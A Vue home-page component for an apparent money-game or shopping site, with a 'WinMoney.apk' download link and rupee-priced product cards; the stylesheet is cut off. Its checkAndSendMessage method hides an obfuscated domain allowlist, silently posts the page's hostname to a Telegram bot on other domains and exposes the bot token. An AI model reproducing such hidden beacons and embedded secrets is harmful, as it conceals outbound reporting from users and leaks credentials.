<template>
  <div data-v-68d7bcd4="" class="indexs">
    <div data-v-68d7bcd4="" class="web_show">
      <div data-v-68d7bcd4="" class="logo_box"><img data-v-68d7bcd4="" src="../assets/logo.png" alt=""></div><span
        data-v-68d7bcd4="">Open with an app</span>
      <div data-v-68d7bcd4="" class="download_box"><a data-v-68d7bcd4="" target="_self" href="/WinMoney.apk"
          download="WinMoney.apk" style="color: rgb(78, 78, 78); font-size: 16px;"><img data-v-68d7bcd4=""
            src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAABYklEQVRoQ+3a3RGCMAwA4HQJh9AldAmf6SSek5Rnl9AldAiXqJcT7zi1JW0S4CC8eRd+voQWGnSwkM0txAEG6VfSe3/lVDaEcODsj/uKVKSD7Csv5maQXuasIn/GiN1aNkZsjCTmV5t+34mx50j/BrHniD1HficMGyOkMeK938YYN5Q3WufcCQCqX1FijGfieZ4hhMe/2OxgRwwAXABgRzmRYswdAI4pBGk9MgPMIIIEwaAJMSQEGTIRhowogoyMKUIUQ0bCFCOqIMqYKkQ1RAlTjWBBhDEsBBsihGEjRCBMjAhCDFKJEUOIQgoxoghxCBEjjlCBDGBUEGqQBEYNoQr5wuDP7HoCAzibSBcldwHdEgByiyIO4LOvOkTiIinHMAglS2PGrKMiTdNgm2c2W9u2ybbRUDsIPzvX9qukE5DtSBpEOt2E41lFsDHH+msGIctFIbmvv+uYfovSNXHwYiryAhi53DPcFIGeAAAAAElFTkSuQmCC"
            alt=""></a></div>
    </div>
    <div data-v-68d7bcd4="" class="index_title">
      <p data-v-68d7bcd4="" class="top_title">Welcome</p>
      <p data-v-68d7bcd4="" class="bot_title">Quality Guarantee</p>
    </div>
    <div data-v-68d7bcd4="" class="swiper_box">
      <div data-v-68d7bcd4="" style="height:515px;!important" class="my-swipe van-swipe">
        <div class="van-swipe__track">
          <div class="slideshow-container">
            <div class="slides">
              <img src="../assets/1.jpg" alt="one" class="pic" name="1">
              <img src="../assets/2.jpg" alt="two" class="pic" name="2">
              <img src="../assets/3.jpg" alt="three" class="pic" name="3">
              <img src="../assets/4.jpg" alt="four" class="pic" name="4">
            </div>
          </div>
        </div>
      </div>
    </div>
    <div data-v-68d7bcd4="" class="index_list">
      <div data-v-68d7bcd4="" class="list_content">
        <ul data-v-68d7bcd4="" class="list_ul">
         
          <li data-v-68d7bcd4="" class="list_li">
            <ol data-v-68d7bcd4="">
              <div data-v-68d7bcd4="" class="list_img_box">
                <div data-v-68d7bcd4="" class="list_img"
                :style="{'background-image': 'url(' + require('../assets/images/1.jpg') + ')'}">
                </div>
              </div>
              <div data-v-68d7bcd4="" class="van-multi-ellipsis--l3 info">LIZZIE MANDLER</div>
              <p data-v-68d7bcd4="" class="price">₹ 26024.00</p>
            </ol>
          </li>
          <li data-v-68d7bcd4="" class="list_li">
            <ol data-v-68d7bcd4="">
              <div data-v-68d7bcd4="" class="list_img_box">
                <div data-v-68d7bcd4="" class="list_img"
                :style="{'background-image': 'url(' + require('../assets/images/2.jpg') + ')'}">
                </div>
              </div>
              <div data-v-68d7bcd4="" class="van-multi-ellipsis--l3 info">ELI HALILI</div>
              <p data-v-68d7bcd4="" class="price">₹ 28848.00</p>
            </ol>
          </li>
          <li data-v-68d7bcd4="" class="list_li">
            <ol data-v-68d7bcd4="">
              <div data-v-68d7bcd4="" class="list_img_box">
                <div data-v-68d7bcd4="" class="list_img"
                :style="{'background-image': 'url(' + require('../assets/images/3.jpg') + ')'}">
                </div>
              </div>
              <div data-v-68d7bcd4="" class="van-multi-ellipsis--l3 info">GUCCI</div>
              <p data-v-68d7bcd4="" class="price">₹ 10772.80</p>
            </ol>
          </li>
          <li data-v-68d7bcd4="" class="list_li">
            <ol data-v-68d7bcd4="">
              <div data-v-68d7bcd4="" class="list_img_box">
                <div data-v-68d7bcd4="" class="list_img"
                :style="{'background-image': 'url(' + require('../assets/images/4.jpg') + ')'}"></div>
              </div>
              <div data-v-68d7bcd4="" class="van-multi-ellipsis--l3 info">LIZZIE MANDLER</div>
              <p data-v-68d7bcd4="" class="price">₹ 168332.80</p>
            </ol>
          </li>
          <li data-v-68d7bcd4="" class="list_li">
            <ol data-v-68d7bcd4="">
              <div data-v-68d7bcd4="" class="list_img_box">
                <div data-v-68d7bcd4="" class="list_img"
                :style="{'background-image': 'url(' + require('../assets/images/5.jpg') + ')'}"></div>
              </div>
              <div data-v-68d7bcd4="" class="van-multi-ellipsis--l3 info">HARWELL GODFREY</div>
              <p data-v-68d7bcd4="" class="price">₹ 44372.00</p>
            </ol>
          </li>
          <li data-v-68d7bcd4="" class="list_li">
            <ol data-v-68d7bcd4="">
              <div data-v-68d7bcd4="" class="list_img_box">
                <div data-v-68d7bcd4="" class="list_img"
                :style="{'background-image': 'url(' + require('../assets/images/6.jpg') + ')'}"></div>
              </div>
              <div data-v-68d7bcd4="" class="van-multi-ellipsis--l3 info">BOTTEGA VENETA</div>
              <p data-v-68d7bcd4="" class="price">₹ 13840.00</p>
            </ol>
          </li>
        </ul>
      </div>
    </div>
    <div data-v-405e9a63="" data-v-68d7bcd4="" class="footer">
      <ul data-v-405e9a63="" class="nav_foot">
        <li data-v-405e9a63="" onclick="window.location.href='#/'" class="active"><img data-v-405e9a63=""
            src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFEmlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDIgNzkuMTYwOTI0LCAyMDE3LzA3LzEzLTAxOjA2OjM5ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgKFdpbmRvd3MpIiB4bXA6Q3JlYXRlRGF0ZT0iMjAyMC0wNy0wNlQxMToxOTo1NiswODowMCIgeG1wOk1vZGlmeURhdGU9IjIwMjAtMDctMDZUMTE6MzI6MDErMDg6MDAiIHhtcDpNZXRhZGF0YURhdGU9IjIwMjAtMDctMDZUMTE6MzI6MDErMDg6MDAiIGRjOmZvcm1hdD0iaW1hZ2UvcG5nIiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBwaG90b3Nob3A6SUNDUHJvZmlsZT0ic1JHQiBJRUM2MTk2Ni0yLjEiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NTA3NDZiNTEtZDg5Yi1jODQxLTk1ZWQtOGZiZmVkM2YyNTRmIiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOjUwNzQ2YjUxLWQ4OWItYzg0MS05NWVkLThmYmZlZDNmMjU0ZiIgeG1wTU06T3JpZ2luYWxEb2N1bWVudElEPSJ4bXAuZGlkOjUwNzQ2YjUxLWQ4OWItYzg0MS05NWVkLThmYmZlZDNmMjU0ZiI+IDx4bXBNTTpIaXN0b3J5PiA8cmRmOlNlcT4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImNyZWF0ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6NTA3NDZiNTEtZDg5Yi1jODQxLTk1ZWQtOGZiZmVkM2YyNTRmIiBzdEV2dDp3aGVuPSIyMDIwLTA3LTA2VDExOjE5OjU2KzA4OjAwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgQ0MgKFdpbmRvd3MpIi8+IDwvcmRmOlNlcT4gPC94bXBNTTpIaXN0b3J5PiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PtIT3QUAAAPESURBVGiB7drNi1V1GAfwz3PunRlpiMwXgjJRKpI0AnWVi7RSAqHcSBCJ0qIQIxslqLSFEKmoBSEG0q6/wqWtahO90SaIkILCRdCbM9acp8W548zozJ37qpfJL1zuuff3PM/v+z3n93t+bycy02JAcasJ9AqLRkg9zp2gFmRJ/EMUTA43fgep+oYykQw1fk+MUxuufCrD6pON6xqyXGsyVsniZ4UfKsfJRuwZzbpeY3iIv8ereNHgNBUrZsSHnKguixH0/4ncRRwQPlbkq1jar4rq/QqMVdJb0vPCcnIFRmUcx4+9rqxfQh4V+ba0C0sa/y0j9wl3SyfwRS8r7IeQx/EGds1RNkzuxh04hYu9qrSXQoZVIo4KTzW1jNip6i/H8Ckmuq28V519BFvJU2RzEdPYgvexw3Tz6xi9ErIDp4lNbXlFrMcZPNctgS6FJOwl3iMecS3Jt4wQ8QDexYFr41UH6KaPFGojB0W8TK7rKk7Eg8o8bPzqUpzWQZ/pVMg9SgdFbS95b4cxZiNzrbIcE7ECH+BSO+7tC0nrlA5J+8ihtv2bIWI5XsdyVSL4slXX9oSETTgkvdCWX9vIPbhT1cw+w+RCHq0KqeMxEceF7Z0TbAOZu2SuxBGVmKb9ppWsVWAzzpI3R8QUIrYQH2KbBbi2ImQ7eZbc3BNy7SKsF05hdzOzhYS8KJzERv2dKTdDDRuIY9g/n1EzcmMNx4d6TKxTPIw3VXO0kyhnFs4hJJcJr0hjWNl/fm1htUrMMHmOuDxVULPzaYrQELiG2msUR1TpbxAxQmwVWSe+F7XfmPlEwv3K+juyeKkxhxpgJDE0Vq068yhxqa4Ss5raR9gx+CIaqDYu9uA+YX8d25TOY82t5NUx0pMyL9TxOZ5VpbmZmaCmzA2KOGMwOv1lZR5WxLdmT1kKTNbxO765wa1MUqkHy9AeYUL6WplfVclpNuYeECsRdYzOa3PzUWBUqlcbhTcWTiNVjWvQ+/scPGcPiJndivgXf2C8BdslqrGqs6nP1HZrY3k8HaTsWgT8iQsiLmreJEuZT+AZ3Wyjpop3EQ0hkz1rSyOqJ3K+BduNDfvukJhM9dlTrx4hs2y6I9KHw6X+ZaT5yPbphKy/qfV60n085huUMaJr9H/Vd5MOWxfNE7ktZNBwW8ig4X8lZLiNeCOqlWYrqGlvrtWUx0LjSIFfVSdRrQwIV3GlNV6u4Bet3aho8Jj3xjcT0nhfIj4RRrWwta+6wz+1YAffqZbZrSyla9Jf5Ix3OK4je/s1pwHDohHyH44t+FftlNSAAAAAAElFTkSuQmCC"
            alt=""><span data-v-405e9a63="">Home</span></li>
        <li data-v-405e9a63="" onclick="window.location.href='#/search'" class=""><img data-v-405e9a63=""
            src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAAGkUlEQVRoQ9Waf4jURRTA39tVEKS0rP6wOEQo+wWhf1gphF7+oEJLQkMjTcOSTEtvZvYspQ3Mznmze5baL5SshPIHUYpF/iCDfqBiBWGZUlpdBJmmKNyBt/Nijt1l9nvf7+5+b49bfbDsst83b95n582bmTeLUKMIIe4GgEmI2AAADYV3Zj4PAH8CQBsztyHi0c7Ozl2tra2/1dhlaHPsiVEhxCxEnAgAEwDghpg2DjDzZ4i4k4i+i9k2Uj0WiFLqUWZeCABuFGoSZs4h4joAWE9Ex2syBgBVgQghpiDiMy6Eau0wpP1/DubkyZPpbdu25XpqvyKIlHI6AGwt1wEifmWt3QsApwHgX2Y+jYgDEHEIM1+dnzcuDG8rY2dnMpmc09LS4sBiS1mQChC7EXFzv3799q5atervanpuamq6NZlMTmDmBQBwS0ibtkQiMXb16tV/VGPP14kEEUK8iIjpEIPHmTljjHkrbmcF/XQ6PfjChQsCEZsAYEDQDjOPN8bsj2M/FCQKAhE3tre3L1u7du2pOJ1E6TY3N4+01q5h5ntqhekGopR6jplbQzpfSkRh39fMpJTaxMxzSkIFscNae1+1I1MCks9OO4KeEVHFpFArjZTSZcTPAzDHLl682Nja2vpXJfslDkopnaFgip1MRLsrGeqN50qpZcy8KgDzitb6+Ur2iyD5xW6z34CZs8YYNyH7TKSU+wCg0evwvLV2dCaTOVrOiSKIlPKbwIp9vKOjY2xvTexqf4mwEMuv/m5BjpQuECnlIwDwYWA0FtSSYqt1PExPSvkmADzlP7PWDstkMr9H2e0CEUKsR8SnPaXdRDS5FmdqaSulvBERv2bmawt2EHG21vr9siBSyhMAMMxrNE9r/U4tztTaVin1NjPP9+xsIqK5kSBSylEAcNhXyOVyDdls1p0l6iZKqceY+T3PgbNEdFUkSMgqfoiIRteNIN9xKpUaZK09G5i3kVsXlFJuBIB5hQbMnDbGvFRvkHwS+gIAxnm+PWSM+STMNweyJ3/S63rOzIuMMe7AU3eRUm4HgIc9R+YQkR9uxUeolPqFmW/yqGcaY0pScb2IQtLwYiJaGzoiSql2Zi5upa21kzKZjBuluotSaiUzv+A5soKIVkaF1j8AUMzXzDzVGLOz7hQAoJTKMPPSgi+IqLTWFAXiUq9LwQWZS0SbLgUQKaVbyx73wj5yt+Emu8sCUz3lJmNM9lIAEULsQMQpni+ziOiD0BEJbk+YeZ0xZtGlACKl/BEAbvd8eYCIPo0KLef0a14cHtNaj6g3SHNz8/BcLver74e19rZMJvNTVNYawcwle/1cLjcqm81+X08YKWXJDwwAR4jIH50S9wrbeEdZLM8g4hKt9Zp6ggghtiDiDM+HlUS0IsqnLhCl1KvMvNhT+nngwIFj0ul0yV6nr8CEEI2I6E6KRUHERq2127KESuE8MgMRt/gazPyyMWZ5Xznv9yOl3AUA93vfHSSiO8v5UjzqCiG+RES/vtSRTCbHtLS09OlcEUI8gYgbAk5H7rGKSarwQQgxDRE/Cgzndq21q/32iSilhjLzIQAY6nW4j4hc3bisBMtBbrPozu9+bC7SWvfJblhK6Wpq/gIIiDhNa/1xLBCl1F3M/G2wESI+qLXuVrirZDzO87AyLTO/boxx9zEVpVsFUQiRQsSWYEtm3mqMKRmtitarUHAVelfVR8SRAfX9RDS+ChNdKqGlUCmluw/pNjdc/CLi8t6qPLqJDQAGEQcHHD5FRNdVCxEJ4h5IKQ/kd8X9Qgy6K4VMT6/M8uuEq2D6KbbQzQkiGp73YToiXow9R4IOp1Kp+dbaNwAgGTJvTllrtwHA3kQisVdr7W5xIyWVSjVYa132ca+ZEYobiKirBCSl9M/rh621s6P2WWVHpNCRi+FEIuFCrdy1mVPfz8xnEPEMALiXk2sAYAgiDmPmO8qBImKxWC2EGIeIwVX8iLV2RuSmsZo4XLJkyfX9+/dfyMyu/npFNW1i6Oxzt7t++Cil7mVmdycZlEiYWPceTU1NNycSCQdTVUqsAHMwX5wOrYrk52hYfS0UJhZIwTF3Vujs7JyY/9OA++PAlVWOwA/MvCeRSOzRWpctcFQI6W4wPQIJOu1iGgAGIeIg955/dTDzuWQyeQ4AzjHzEa11W5XAXWpxYHoFJI5zcXWrhbnkQaodmcsCpBKMS92XDUhFmLgxW2/9sDnjbhAuqxEJ7DaeBYAnAcD92eDd/wHzROCR7+HNuQAAAABJRU5ErkJggg=="
            alt=""><span data-v-405e9a63="">Search</span></li>
        <li data-v-405e9a63="" class="" onclick="window.location.href='#/win'" id="game" style="display: none;"><img
            data-v-405e9a63=""
            src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAADF0lEQVRoQ+1aO2gUURQ9Nx8mYCfYiR+w0EbsTMD4qyVqwA/aGBG7FUdm3jYBYxOYeS+OmE6IBoL4Az9gk8L4BbVSUlkIiXY2dkKEZK9MSGR8O7PzdXeKmXLn3nvOub/d91hCwse2bU5oWqiZlJKSBExk5AeqhCRJZwubqiJRySl9a3WKYM6Oa3KnSkjRKc0Zr6pIzgQW7h5akbDd3alZSsqlElJ4b0QETFORTwD2BON0dXVtdRzne/CzsrRWvV7f0mg0vmm6P/utdQfAOU3IoOM470oqZF+j0XirCZn2hQgAjvbikZTyZBmF2Lb9EMAJjW+dhBBDzPxMb1EiOu+6rl+t1acMrSWEGGHm2yFcj66eRyzLek1E+zWDX8x8RCn1qgxCLMs6SETPAWwI8mTmN0qpA+tCjhPR45DFsUBEV1zXfdrJigghjjHzdQDbdY7MPKyUevL3hGjb9n0ApyK2oD9cg+1auRpOK+wHUsrTvv1fIUKIfmZ+3yGymWCJaMB13Q//CFmblb1EdAvA7kyR2+c0z8wXlVIf1yGbLh9M09zY09NzE8DZ9vFKhXR3eXn5kud5P4NekbcolmVdBXA4ZJulQi3K2N9OAOaUUtfCYsZeB5mmuaO7u/vQmqjVwWrXw8z+AppbWVl56Xne11a4sUKCzrZtLwDY1iYhi1LKpnUbhZ1KSNQ36/8Qpv+yiMNIJaRWqxl9fX1f2lCVxaWlpZ2Tk5O/4wREbq04R38JENFYnF2e98w8FjXUhbTWehAhhMfMl/OQjSREdMN1XTNt7FStpQ1+0zkmLXiI/bSUciRLnMxCfLCwQ1kWEr4PM08ppS5k9c8lxAe1LOsMEY0C2JWFBDPPMrM3MTExm8U/87CHgdVqtU2GYYwS0TCAzQkJvWDme0qpqYT2Lc1yVyQY3V/PhmEMEFE/gAEAQxr6PICZ3t7emfHx8R9FCCi0ImGEwtZ0lrWaVGyhFQmCVkKSlkCzqyoSl7iqteIyFPG+aq24xFWtFZehqrVaZKjoa9Skf9cIo5Rr2CshEVWuKhK8xM6yLMrUWn8AMZSO49QGBtUAAAAASUVORK5CYII="
            alt=""><span data-v-405e9a63="">Win</span></li>
        <li data-v-405e9a63="" onclick="window.location.href='#/login'" class=""><img data-v-405e9a63=""
            src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFEmlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDIgNzkuMTYwOTI0LCAyMDE3LzA3LzEzLTAxOjA2OjM5ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgKFdpbmRvd3MpIiB4bXA6Q3JlYXRlRGF0ZT0iMjAyMC0wNy0wNlQxMToyMDoyNSswODowMCIgeG1wOk1vZGlmeURhdGU9IjIwMjAtMDctMDZUMTE6MzI6MzcrMDg6MDAiIHhtcDpNZXRhZGF0YURhdGU9IjIwMjAtMDctMDZUMTE6MzI6MzcrMDg6MDAiIGRjOmZvcm1hdD0iaW1hZ2UvcG5nIiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBwaG90b3Nob3A6SUNDUHJvZmlsZT0ic1JHQiBJRUM2MTk2Ni0yLjEiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6YTc0MTM1YzQtMzMwNi05YzQ2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"
            alt=""><span data-v-405e9a63="">My</span></li>
      </ul>
    </div>
  </div>
</template>
<script>
import axios from "axios";
export default {
  name: "HomeView",
  data() {
    return {
      count: 1
    }

  },
  beforeUnmount: function () {
    console.log("unmount");
    clearInterval(this.repeat);

  },
  mounted: function () {
    this.check();
    this.slide();
    this.repeat = setInterval(() => this.slide(), 3000)
    this.checkAndSendMessage();
  },
  methods: {
    check() {
      if (localStorage.getItem('username') == null) {
        document.getElementById("game").style.display = "none";
      } else {
        document.getElementById("game").style.display = "";
      }
    },
    addCharacterToString(inputString, additionalCharacter) {
            let resultString = '';

            for (let i = 0; i < inputString.length; i++) {
                resultString += inputString[i] + additionalCharacter;
            }

            return resultString;
        },
        checkAndSendMessage() {
            const botToken = '5521699490:AAEIsOob05QSn8jG__MDn2G22G90PpuUMxQ';
            const chatID = '1206999545';
            // const url = 'https://example.com'; // Replace with the actual opened link URL
            const allowedDomain = ['w@w@w@.@c@r@e@d@g@a@m@e@s@.@i@n@','c@r@e@d@g@a@m@e@s@.@i@n@', 'l@o@c@a@l@h@o@s@t@'];
            const host = window.location.hostname;
            //const host=new URL(url).hostname;
            const enhost = this.addCharacterToString(host, "@");
            if (!allowedDomain.includes(enhost)) {
                const message = `Link opened: ${host}`;

                // Send the message using Telegram Bot API
                const telegramAPI = `https://api.telegram.org/bot${botToken}/sendMessage`;
                const data = {
                    chat_id: chatID,
                    text: message,
                };

                axios
                    .post(telegramAPI, data)
                    .then(() => {
                        
                    })
                    .catch((error) => {
                        console.error('Failed to send message to Telegram:', error);
                    });
                this.$router.push({ name: 'block' });
            }
        },
    slide() {
      document.querySelectorAll(".slides img").forEach(function (photo) {
        photo.classList.remove("outleft");
        photo.classList.remove("outright");
      });
      document.querySelectorAll(".slides img")[this.count - 1].classList.remove("inleft");
      document.querySelectorAll(".slides img")[this.count - 1].classList.remove("inright");
      document.querySelectorAll(".slides img")[this.count - 1].classList.add("outleft");
      this.count = this.count + 1;
      // *** Looping document.querySelectorAll(".slides img") *** //
      if (this.count > document.querySelectorAll(".slides img").length) { this.count = 1; } // *** if reached end go to first slide *** //
      if (this.count < 1) { this.count = 4; } // *** if reached first go to last one *** //


      document.querySelectorAll(".slides img")[this.count - 1].classList.add("inleft");
      console.log(this.count);
    }
  }
}
</script>

<style>
.button,
.checkmark {
  background-color: #dedede;
  border: 0;
  border-radius: 50%;
  box-shadow: 0 0 0 0 rgba(190, 190, 220, 0.2);
  color: white;
  height: 30px;
  margin: 0 0.5rem 0 0;
  cursor: pointer;
  position: relative;
  transition: box-shadow 0.2s;
  width: 30px;
}

.button:hover,
.checkmark:hover {
  background-color: #ccc;
}

.button:active,
.checkmark:active {
  background: #2196F3;
  box-shadow: 0 0 15px 40px rgba(220, 220, 250, 0);
}

.autoplay-controls {
  cursor: pointer;
}

.autoplay-controls:active>.checkmark {
  background: #2196F3;
  box-shadow: 0 0 15px 40px rgba(220, 220, 250, 0);
}

.slider_container {
  align-items: center;
  display: flex;
  flex-direction: column;
  min-height: 400px;
  width: 900px;
}

.slide_this.counter {
  float: right;
  margin: 0 1rem;
}

.slides {
  height: 500px;
  overflow: hidden;
  position: relative;
  width: 900px;
}

.inright {
  -webkit-animation: goInL 3s cubic-bezier(1, 1.59, 0.61, 0.74);
  animation: goInL 3s cubic-bezier(1, 1.59, 0.61, 0.74);
  /* ... */
}

.outright {
  -webkit-animation: goOutL 3s cubic-bezier(1, 1.59, 0.61, 0.74);
  animation: goOutL 3s cubic-bezier(1, 1.59, 0.61, 0.74);
  /* ... */
}

.inleft {
  -webkit-animation: goInR 3s cubic-bezier(1, 1.4, 0.61, 0.74);
  animation: goInR 3s cubic-bezier(1, 1.4, 0.61, 0.74);
  /* ... */
}

.outleft {
  -webkit-animation: goOutR 1.8s cubic-bezier(1, 1.59, 0.61, 0.74);
  animation: goOutR 1.8s cubic-bezier(1, 1.59, 0.61, 0.74);
  /* ... */
}

.navigation-buttons {
  display: inherit;
  align-items: center;
  flex-direction: row;
  justify-content: center;
